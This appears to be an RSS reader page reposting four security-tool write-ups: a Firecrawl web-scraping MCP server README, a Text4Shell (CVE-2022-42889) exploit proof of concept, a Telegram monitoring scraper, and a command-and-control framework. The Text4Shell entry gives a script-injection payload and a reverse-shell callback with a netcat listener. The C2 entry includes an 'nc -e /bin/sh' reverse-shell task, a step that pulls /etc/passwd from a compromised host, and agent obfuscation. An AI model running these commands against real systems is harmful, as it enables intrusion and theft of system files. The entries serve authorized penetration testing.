FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayKitPloit - PenTest Tools!

Firecrawl-Mcp-Server - Official Firecrawl MCP Server - Adds Powerful Web Scraping To Cursor, Claude And Any Other LLM Clients

By: Unknown


A Model Context Protocol (MCP) server implementation that integrates with Firecrawl for web scraping capabilities.

Big thanks to @vrknetha, @cawstudios for the initial implementation!

You can also play around with our MCP Server on MCP.so's playground. Thanks to MCP.so for hosting and @gstarwd for integrating our server.

Β 

Features

  • Scrape, crawl, search, extract, deep research and batch scrape support
  • Web scraping with JS rendering
  • URL discovery and crawling
  • Web search with content extraction
  • Automatic retries with exponential backoff
  • Efficient batch processing with built-in rate limiting
  • Credit usage monitoring for cloud API
  • Comprehensive logging system
  • Support for cloud and self-hosted Firecrawl instances
  • Mobile/Desktop viewport support
  • Smart content filtering with tag inclusion/exclusion

Installation

Running with npx

env FIRECRAWL_API_KEY=fc-YOUR_API_KEY npx -y firecrawl-mcp

Manual Installation

npm install -g firecrawl-mcp

Running on Cursor

Configuring Cursor πŸ–₯️ Note: Requires Cursor version 0.45.6+ For the most up-to-date configuration instructions, please refer to the official Cursor documentation on configuring MCP servers: Cursor MCP Server Configuration Guide

To configure Firecrawl MCP in Cursor v0.45.6

  1. Open Cursor Settings
  2. Go to Features > MCP Servers
  3. Click "+ Add New MCP Server"
  4. Enter the following:
  5. Name: "firecrawl-mcp" (or your preferred name)
  6. Type: "command"
  7. Command: env FIRECRAWL_API_KEY=your-api-key npx -y firecrawl-mcp

To configure Firecrawl MCP in Cursor v0.48.6

  1. Open Cursor Settings
  2. Go to Features > MCP Servers
  3. Click "+ Add new global MCP server"
  4. Enter the following code: json { "mcpServers": { "firecrawl-mcp": { "command": "npx", "args": ["-y", "firecrawl-mcp"], "env": { "FIRECRAWL_API_KEY": "YOUR-API-KEY" } } } }

If you are using Windows and are running into issues, try cmd /c "set FIRECRAWL_API_KEY=your-api-key && npx -y firecrawl-mcp"

Replace your-api-key with your Firecrawl API key. If you don't have one yet, you can create an account and get it from https://www.firecrawl.dev/app/api-keys

After adding, refresh the MCP server list to see the new tools. The Composer Agent will automatically use Firecrawl MCP when appropriate, but you can explicitly request it by describing your web scraping needs. Access the Composer via Command+L (Mac), select "Agent" next to the submit button, and enter your query.

Running on Windsurf

Add this to your ./codeium/windsurf/model_config.json:

{
"mcpServers": {
"mcp-server-firecrawl": {
"command": "npx",
"args": ["-y", "firecrawl-mcp"],
"env": {
"FIRECRAWL_API_KEY": "YOUR_API_KEY"
}
}
}
}

Installing via Smithery (Legacy)

To install Firecrawl for Claude Desktop automatically via Smithery:

npx -y @smithery/cli install @mendableai/mcp-server-firecrawl --client claude

Configuration

Environment Variables

Required for Cloud API

  • FIRECRAWL_API_KEY: Your Firecrawl API key
  • Required when using cloud API (default)
  • Optional when using self-hosted instance with FIRECRAWL_API_URL
  • FIRECRAWL_API_URL (Optional): Custom API endpoint for self-hosted instances
  • Example: https://firecrawl.your-domain.com
  • If not provided, the cloud API will be used (requires API key)

Optional Configuration

Retry Configuration
  • FIRECRAWL_RETRY_MAX_ATTEMPTS: Maximum number of retry attempts (default: 3)
  • FIRECRAWL_RETRY_INITIAL_DELAY: Initial delay in milliseconds before first retry (default: 1000)
  • FIRECRAWL_RETRY_MAX_DELAY: Maximum delay in milliseconds between retries (default: 10000)
  • FIRECRAWL_RETRY_BACKOFF_FACTOR: Exponential backoff multiplier (default: 2)
Credit Usage Monitoring
  • FIRECRAWL_CREDIT_WARNING_THRESHOLD: Credit usage warning threshold (default: 1000)
  • FIRECRAWL_CREDIT_CRITICAL_THRESHOLD: Credit usage critical threshold (default: 100)

Configuration Examples

For cloud API usage with custom retry and credit monitoring:

# Required for cloud API
export FIRECRAWL_API_KEY=your-api-key

# Optional retry configuration
export FIRECRAWL_RETRY_MAX_ATTEMPTS=5 # Increase max retry attempts
export FIRECRAWL_RETRY_INITIAL_DELAY=2000 # Start with 2s delay
export FIRECRAWL_RETRY_MAX_DELAY=30000 # Maximum 30s delay
export FIRECRAWL_RETRY_BACKOFF_FACTOR=3 # More aggressive backoff

# Optional credit monitoring
export FIRECRAWL_CREDIT_WARNING_THRESHOLD=2000 # Warning at 2000 credits
export FIRECRAWL_CREDIT_CRITICAL_THRESHOLD=500 # Critical at 500 credits

For self-hosted instance:

# Required for self-hosted
export FIRECRAWL_API_URL=https://firecrawl.your-domain.com

# Optional authentication for self-hosted
export FIRECRAWL_API_KEY=your-api-key # If your instance requires auth

# Custom retry configuration
export FIRECRAWL_RETRY_MAX_ATTEMPTS=10
export FIRECRAWL_RETRY_INITIAL_DELAY=500 # Start with faster retries

Usage with Claude Desktop

Add this to your claude_desktop_config.json:

{
"mcpServers": {
"mcp-server-firecrawl": {
"command": "npx",
"args": ["-y", "firecrawl-mcp"],
"env": {
"FIRECRAWL_API_KEY": "YOUR_API_KEY_HERE",

"FIRECRAWL_RETRY_MAX_ATTEMPTS": "5",
"FIRECRAWL_RETRY_INITIAL_DELAY": "2000",
"FIRECRAWL_RETRY_MAX_DELAY": "30000",
"FIRECRAWL_RETRY_BACKOFF_FACTOR": "3",

"FIRECRAWL_CREDIT_WARNING_THRESHOLD": "2000",
"FIRECRAWL_CREDIT_CRITICAL_THRESHOLD": "500"
}
}
}
}

System Configuration

The server includes several configurable parameters that can be set via environment variables. Here are the default values if not configured:

const CONFIG = {
retry: {
maxAttempts: 3, // Number of retry attempts for rate-limited requests
initialDelay: 1000, // Initial delay before first retry (in milliseconds)
maxDelay: 10000, // Maximum delay between retries (in milliseconds)
backoffFactor: 2, // Multiplier for exponential backoff
},
credit: {
warningThreshold: 1000, // Warn when credit usage reaches this level
criticalThreshold: 100, // Critical alert when credit usage reaches this level
},
};

These configurations control:

  1. Retry Behavior

  2. Automatically retries failed requests due to rate limits

  3. Uses exponential backoff to avoid overwhelming the API
  4. Example: With default settings, retries will be attempted at:

    • 1st retry: 1 second delay
    • 2nd retry: 2 seconds delay
    • 3rd retry: 4 seconds delay (capped at maxDelay)
  5. Credit Usage Monitoring

  6. Tracks API credit consumption for cloud API usage
  7. Provides warnings at specified thresholds
  8. Helps prevent unexpected service interruption
  9. Example: With default settings:
    • Warning at 1000 credits remaining
    • Critical alert at 100 credits remaining

Rate Limiting and Batch Processing

The server utilizes Firecrawl's built-in rate limiting and batch processing capabilities:

  • Automatic rate limit handling with exponential backoff
  • Efficient parallel processing for batch operations
  • Smart request queuing and throttling
  • Automatic retries for transient errors

Available Tools

1. Scrape Tool (firecrawl_scrape)

Scrape content from a single URL with advanced options.

{
"name": "firecrawl_scrape",
"arguments": {
"url": "https://example.com",
"formats": ["markdown"],
"onlyMainContent": true,
"waitFor": 1000,
"timeout": 30000,
"mobile": false,
"includeTags": ["article", "main"],
"excludeTags": ["nav", "footer"],
"skipTlsVerification": false
}
}

2. Batch Scrape Tool (firecrawl_batch_scrape)

Scrape multiple URLs efficiently with built-in rate limiting and parallel processing.

{
"name": "firecrawl_batch_scrape",
"arguments": {
"urls": ["https://example1.com", "https://example2.com"],
"options": {
"formats": ["markdown"],
"onlyMainContent": true
}
}
}

Response includes operation ID for status checking:

{
"content": [
{
"type": "text",
"text": "Batch operation queued with ID: batch_1. Use firecrawl_check_batch_status to check progress."
}
],
"isError": false
}

3. Check Batch Status (firecrawl_check_batch_status)

Check the status of a batch operation.

{
"name": "firecrawl_check_batch_status",
"arguments": {
"id": "batch_1"
}
}

4. Search Tool (firecrawl_search)

Search the web and optionally extract content from search results.

{
"name": "firecrawl_search",
"arguments": {
"query": "your search query",
"limit": 5,
"lang": "en",
"country": "us",
"scrapeOptions": {
"formats": ["markdown"],
"onlyMainContent": true
}
}
}

5. Crawl Tool (firecrawl_crawl)

Start an asynchronous crawl with advanced options.

{
"name": "firecrawl_crawl",
"arguments": {
"url": "https://example.com",
"maxDepth": 2,
"limit": 100,
"allowExternalLinks": false,
"deduplicateSimilarURLs": true
}
}

6. Extract Tool (firecrawl_extract)

Extract structured information from web pages using LLM capabilities. Supports both cloud AI and self-hosted LLM extraction.

{
"name": "firecrawl_extract",
"arguments": {
"urls": ["https://example.com/page1", "https://example.com/page2"],
"prompt": "Extract product information including name, price, and description",
"systemPrompt": "You are a helpful assistant that extracts product information",
"schema": {
"type": "object",
"properties": {
"name": { "type": "string" },
"price": { "type": "number" },
"description": { "type": "string" }
},
"required": ["name", "price"]
},
"allowExternalLinks": false,
"enableWebSearch": false,
"includeSubdomains": false
}
}

Example response:

{
"content": [
{
"type": "text",
"text": {
"name": "Example Product",
"price": 99.99,
"description": "This is an example product description"
}
}
],
"isError": false
}

Extract Tool Options:

  • urls: Array of URLs to extract information from
  • prompt: Custom prompt for the LLM extraction
  • systemPrompt: System prompt to guide the LLM
  • schema: JSON schema for structured data extraction
  • allowExternalLinks: Allow extraction from external links
  • enableWebSearch: Enable web search for additional context
  • includeSubdomains: Include subdomains in extraction

When using a self-hosted instance, the extraction will use your configured LLM. For cloud API, it uses Firecrawl's managed LLM service.

7. Deep Research Tool (firecrawl_deep_research)

Conduct deep web research on a query using intelligent crawling, search, and LLM analysis.

{
"name": "firecrawl_deep_research",
"arguments": {
"query": "how does carbon capture technology work?",
"maxDepth": 3,
"timeLimit": 120,
"maxUrls": 50
}
}

Arguments:

  • query (string, required): The research question or topic to explore.
  • maxDepth (number, optional): Maximum recursive depth for crawling/search (default: 3).
  • timeLimit (number, optional): Time limit in seconds for the research session (default: 120).
  • maxUrls (number, optional): Maximum number of URLs to analyze (default: 50).

Returns:

  • Final analysis generated by an LLM based on research. (data.finalAnalysis)
  • May also include structured activities and sources used in the research process.

8. Generate LLMs.txt Tool (firecrawl_generate_llmstxt)

Generate a standardized llms.txt (and optionally llms-full.txt) file for a given domain. This file defines how large language models should interact with the site.

{
"name": "firecrawl_generate_llmstxt",
"arguments": {
"url": "https://example.com",
"maxUrls": 20,
"showFullText": true
}
}

Arguments:

  • url (string, required): The base URL of the website to analyze.
  • maxUrls (number, optional): Max number of URLs to include (default: 10).
  • showFullText (boolean, optional): Whether to include llms-full.txt contents in the response.

Returns:

  • Generated llms.txt file contents and optionally the llms-full.txt (data.llmstxt and/or data.llmsfulltxt)

Logging System

The server includes comprehensive logging:

  • Operation status and progress
  • Performance metrics
  • Credit usage monitoring
  • Rate limit tracking
  • Error conditions

Example log messages:

[INFO] Firecrawl MCP Server initialized successfully
[INFO] Starting scrape for URL: https://example.com
[INFO] Batch operation queued with ID: batch_1
[WARNING] Credit usage has reached warning threshold
[ERROR] Rate limit exceeded, retrying in 2s...

Error Handling

The server provides robust error handling:

  • Automatic retries for transient errors
  • Rate limit handling with backoff
  • Detailed error messages
  • Credit usage warnings
  • Network resilience

Example error response:

{
"content": [
{
"type": "text",
"text": "Error: Rate limit exceeded. Retrying in 2 seconds..."
}
],
"isError": true
}

Development

# Install dependencies
npm install

# Build
npm run build

# Run tests
npm test

Contributing

  1. Fork the repository
  2. Create your feature branch
  3. Run tests: npm test
  4. Submit a pull request

License

MIT License - see LICENSE file for details



Text4Shell-Exploit - A Custom Python-based Proof-Of-Concept (PoC) Exploit Targeting Text4Shell (CVE-2022-42889), A Critical Remote Code Execution Vulnerability In Apache Commons Text Versions < 1.10

By: Unknown


A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions < 1.10. This exploit targets vulnerable Java applications that use the StringSubstitutor class with interpolation enabled, allowing injection of ${script:...} expressions to execute arbitrary system commands.

In this PoC, exploitation is demonstrated via the data query parameter; however, the vulnerable parameter name may vary depending on the implementation. Users should adapt the payload and request path accordingly based on the target application's logic.

Disclaimer: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk.


Description

This is a custom Python3 exploit for the Apache Commons Text vulnerability known as Text4Shell (CVE-2022-42889). It allows Remote Code Execution (RCE) via insecure interpolators when user input is dynamically evaluated by StringSubstitutor.

Tested against: - Apache Commons Text < 1.10.0 - Java applications using ${script:...} interpolation from untrusted input

Usage

python3 text4shell.py <target_ip> <callback_ip> <callback_port>

Example

python3 text4shell.py 127.0.0.1 192.168.1.2 4444

Make sure to set up a lsitener on your attacking machine:

nc -nlvp 4444

Payload Logic

The script injects:

${script:javascript:java.lang.Runtime.getRuntime().exec(...)}

The reverse shell is sent via /data parameter using a POST request.



TEx - Telegram Monitor

By: Zion3R


TEx is a Telegram Explorer tool created to help Researchers, Investigators and Law Enforcement Agents to Collect and Process the Huge Amount of Data Generated from Criminal, Fraud, Security and Others Telegram Groups.


BETA VERSION

Please note that this project has been in beta for a few weeks, so it is possible that you may encounter bugs that have not yet been mapped out.
I kindly ask you to report the bugs at: https://github.com/guibacellar/TEx/issues

  • Python 3.8.1+ (Deprecated. Consider using version 3.10+)
  • Windows x64 or Linux x64

  • Connection Manager
  • Group Information Scrapper
  • List Groups
  • Automatic Group Information Sync
  • Automatic Users Information Sync
  • Messages Listener
  • Messages Scrapper
  • Download Media
  • HTML Report Generation
  • Export Downloaded Files
  • Export Messages

Telegram Explorer is available through pip, so, just use pip install in order to fully install TeX.

pip install TelegramExplorer

To upgrade TeX to the latest version, just use pip install upgrade command.

pip install --upgrade TelegramExplorer

https://telegramexplorer.readthedocs.io/en/latest/



Commander - A Command And Control (C2) Server

By: Zion3R


Commander is a command and control framework (C2) written in Python, Flask and SQLite. ItΒ comes with two agents written in Python and C.

Under Continuous Development

Not script-kiddie friendly


Features

  • Fully encrypted communication (TLS)
  • Multiple Agents
  • Obfuscation
  • Interactive Sessions
  • Scalable
  • Base64 data encoding
  • RESTful API

Agents

  • Python 3
    • The python agent supports:
      • sessions, an interactive shell between the admin and the agent (like ssh)
      • obfuscation
      • Both Windows and Linux systems
      • download/upload files functionality
  • C
    • The C agent supports only the basic functionality for now, the control of tasks for the agents
    • Only for Linux systems

Requirements

Python >= 3.6 is required to run and the following dependencies

Linux for the admin.py and c2_server.py. (Untested for windows)
apt install libcurl4-openssl-dev libb64-dev
apt install openssl
pip3 install -r requirements.txt

How to Use it

First create the required certs and keys

# if you want to secure your key with a passphrase exclude the -nodes
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt -days 365 -nodes

Start the admin.py module first in order to create a local sqlite db file

python3 admin.py

Continue by running the server

python3 c2_server.py

And last the agent. For the python case agent you can just run it but in the case of the C agent you need to compile it first.

# python agent
python3 agent.py

# C agent
gcc agent.c -o agent -lcurl -lb64
./agent

By default both the Agents and the server are running over TLS and base64. The communication point is set to 127.0.0.1:5000 and in case a different point is needed it should be changed in Agents source files.

As the Operator/Administrator you can use the following commands to control your agents

Commands:

task add arg c2-commands
Add a task to an agent, to a group or on all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
c2-commands: possible values are c2-register c2-shell c2-sleep c2-quit
c2-register: Triggers the agent to register again.
c2-shell cmd: It takes an shell command for the agent to execute. eg. c2-shell whoami
cmd: The command to execute.
c2-sleep: Configure the interval that an agent will check for tasks.
c2-session port: Instructs the agent to open a shell session with the server to this port.
port: The port to connect to. If it is not provided it defaults to 5555.
c2-quit: Forces an agent to quit.

task delete arg
Delete a task from an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show agent arg
Displays inf o for all the availiable agents or for specific agent.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show task arg
Displays the task of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show result arg
Displays the history/result of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
find active agents
Drops the database so that the active agents will be registered again.

exit
Bye Bye!


Sessions:

sessions server arg [port]
Controls a session handler.
arg: can have the following values: 'start' , 'stop' 'status'
port: port is optional for the start arg and if it is not provided it defaults to 5555. This argument defines the port of the sessions server
sessions select arg
Select in which session to attach.
arg: the index from the 'sessions list' result
sessions close arg
Close a session.
arg: the index from the 'sessions list' result
sessions list
Displays the availiable sessions
local-ls directory
Lists on your host the files on the selected directory
download 'file'
Downloads the 'file' locally on the current directory
upload 'file'
Uploads a file in the directory where the agent currently is

Special attention should be given to the 'find active agents' command. This command deletes all the tables and creates them again. It might sound scary but it is not, at least that is what i believe :P

The idea behind this functionality is that the c2 server can request from an agent to re-register at the case that it doesn't recognize him. So, since we want to clear the db from unused old entries and at the same time find all the currently active hosts we can drop the tables and trigger the re-register mechanism of the c2 server. See below for the re-registration mechanism.

Flows

Below you can find a normal flow diagram

Normal Flow

In case where the environment experiences a major failure like a corrupted database or some other critical failure the re-registration mechanism is enabled so we don't lose our connection with our agents.

More specifically, in case where we lose the database we will not have any information about the uuids that we are receiving thus we can't set tasks on them etc... So, the agents will keep trying to retrieve their tasks and since we don't recognize them we will ask them to register again so we can insert them in our database and we can control them again.

Below is the flow diagram for this case.

Re-register Flow

Useful examples

To setup your environment start the admin.py first and then the c2_server.py and run the agent. After you can check the availiable agents.

# show all availiable agents
show agent all

To instruct all the agents to run the command "id" you can do it like this:

To check the history/ previous results of executed tasks for a specific agent do it like this:
# check the results of a specific agent
show result 85913eb1245d40eb96cf53eaf0b1e241

You can also change the interval of the agents that checks for tasks to 30 seconds like this:

# to set it for all agents
task add all c2-sleep 30

To open a session with one or more of your agents do the following.

# find the agent/uuid
show agent all

# enable the server to accept connections
sessions server start 5555

# add a task for a session to your prefered agent
task add your_prefered_agent_uuid_here c2-session 5555

# display a list of available connections
sessions list

# select to attach to one of the sessions, lets select 0
sessions select 0

# run a command
id

# download the passwd file locally
download /etc/passwd

# list your files locally to check that passwd was created
local-ls

# upload a file (test.txt) in the directory where the agent is
upload test.txt

# return to the main cli
go back

# check if the server is running
sessions server status

# stop the sessions server
sessions server stop

If for some reason you want to run another external session like with netcat or metaspolit do the following.

# show all availiable agents
show agent all

# first open a netcat on your machine
nc -vnlp 4444

# add a task to open a reverse shell for a specific agent
task add 85913eb1245d40eb96cf53eaf0b1e241 c2-shell nc -e /bin/sh 192.168.1.3 4444

This way you will have a 'die hard' shell that even if you get disconnected it will get back up immediately. Only the interactive commands will make it die permanently.

Obfuscation

The python Agent offers obfuscation using a basic AES ECB encryption and base64 encoding

Edit the obfuscator.py file and change the 'key' value to a 16 char length key in order to create a custom payload. The output of the new agent can be found in Agents/obs_agent.py

You can run it like this:

python3 obfuscator.py

# and to run the agent, do as usual
python3 obs_agent.py

Tips &Tricks

  1. The build-in flask app server can't handle multiple/concurrent requests. So, you can use the gunicorn server for better performance like this:
gunicorn -w 4 "c2_server:create_app()" --access-logfile=- -b 0.0.0.0:5000 --certfile server.crt --keyfile server.key 
  1. Create a binary file for your python agent like this
pip install pyinstaller
pyinstaller --onefile agent.py

The binary can be found under the dist directory.

In case something fails you may need to update your python and pip libs. If it continues failing then ..well.. life happened

  1. Create new certs in each engagement

  2. Backup your c2.db, it is easy... just a file

Testing

pytest was used for the testing. You can run the tests like this:

cd tests/
py.test

Be careful: You must run the tests inside the tests directory otherwise your c2.db will be overwritten and you will lose your data

To check the code coverage and produce a nice html report you can use this:

# pip3 install pytest-cov
python -m pytest --cov=Commander --cov-report html

Disclaimer: This tool is only intended to be a proof of concept demonstration tool for authorized security testing. Running this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.



❌